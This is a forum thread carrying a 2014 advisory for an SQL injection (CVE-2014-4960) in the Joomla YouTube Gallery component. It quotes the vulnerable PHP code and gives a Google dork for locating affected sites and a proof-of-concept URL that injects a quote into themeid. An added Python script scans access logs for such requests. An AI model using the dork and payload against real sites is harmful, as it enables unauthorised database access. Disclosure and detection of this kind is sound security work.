Bug: Joomla Youtube Gallery 4.1.7 SQL Injection
#1
# Exploit Title: Joomla component com_youtubegallery - SQL Injection vulnerability
# Google Dork: inurl:index.php?option=com_youtubegallery
# Date: 15-07-2014
# Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com)
# Vendor Homepage: http://www.joomlaboat.com/youtube-gallery
# Software Link: http://www.joomlaboat.com/youtube-gallery
# Version: 4.x ( 3.x maybe)
# Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3
# CVE : CVE-2014-4960


Detail:
In line: 40, file: components\com_youtubegallery\models\gallery.php,
if the parameter listid is an int (or can be cast to int), $listid and $themeid
will not be sanitized.
Source code:

PHP Code:
40: if(JRequest::getInt('listid'))
41: {
42:     //Shadow Box
43:     $listid=JRequest::getVar('listid');
44:
45:
46:     //Get Theme
47:     $m_themeid=(int)JRequest::getVar('mobilethemeid');
48:     if($m_themeid!=0)
49:     {
50:         if(YouTubeGalleryMisc::check_user_agent('mobile'))
51:             $themeid=$m_themeid;
52:         else
53:             $themeid=JRequest::getVar('themeid');
54:     }
55:     else
56:         $themeid=JRequest::getVar('themeid');
57: }
Afterwards, $themeid and $listid are used in lines 86 and 92. The two methods
getVideoListTableRow and getThemeTableRow concatenate strings to construct the
SQL query, so it is vulnerable to SQL Injection.
Source code:
86: if(!$this->misc->getVideoListTableRow($listid))
87: {
88: echo '<p>No video found</p>';
89: return false;
90: }
91:
92: if(!$this->misc->getThemeTableRow($themeid))
93: {
94: echo '<p>No video found</p>';
95: return false;
96: }

# Site POF:
http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700
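A detection sketch for the pattern described in the post above, added here as an example and not part of the original post or the component's code: it flags requests to com_youtubegallery whose listid or themeid is not a plain integer after URL decoding. The combined access-log format and the sample log lines are assumptions, constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory says reach the SQL query without sanitization.
WATCHED = ("listid", "themeid")
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jul/2014:10:00:00 +0000] "GET /index.php?option=com_youtubegallery'
    '&view=youtubegallery&listid=1&themeid=1&tmpl=component HTTP/1.1" 200 5120',
    '192.0.2.44 - - [15/Jul/2014:10:00:07 +0000] "GET /index.php?option=com_youtubegallery'
    '&view=youtubegallery&listid=1&themeid=1%27&tmpl=component HTTP/1.1" 500 312',
    '192.0.2.10 - - [15/Jul/2014:10:00:09 +0000] "GET /index.php?option=com_content'
    '&view=article&id=abc HTTP/1.1" 404 210',
    '192.0.2.44 - - [15/Jul/2014:10:00:12 +0000] "GET /index.php?option=com_youtubegallery'
    '&listid=1x&themeid=2 HTTP/1.1" 200 5120',
]

def suspicious_params(url):
    """Return {name: decoded value} for watched parameters that are not plain integers."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if "com_youtubegallery" not in query.get("option", []):
        return {}
    return {
        name: value
        for name in WATCHED
        for value in query.get(name, [])
        if not re.fullmatch(r"-?[0-9]+", value)
    }

def scan(log_lines):
    """Return [(line_number, hits)] for log lines carrying a non-integer watched parameter."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        hits = suspicious_params(match.group(1)) if match else {}
        if hits:
            findings.append((number, hits))
    return findings

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: non-integer parameters {hits}")
```

Because the component only gates on JRequest::getInt('listid') and then reads the raw values, any hit here is a request whose raw parameter differs from the integer the gate saw.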
#2
Thanks.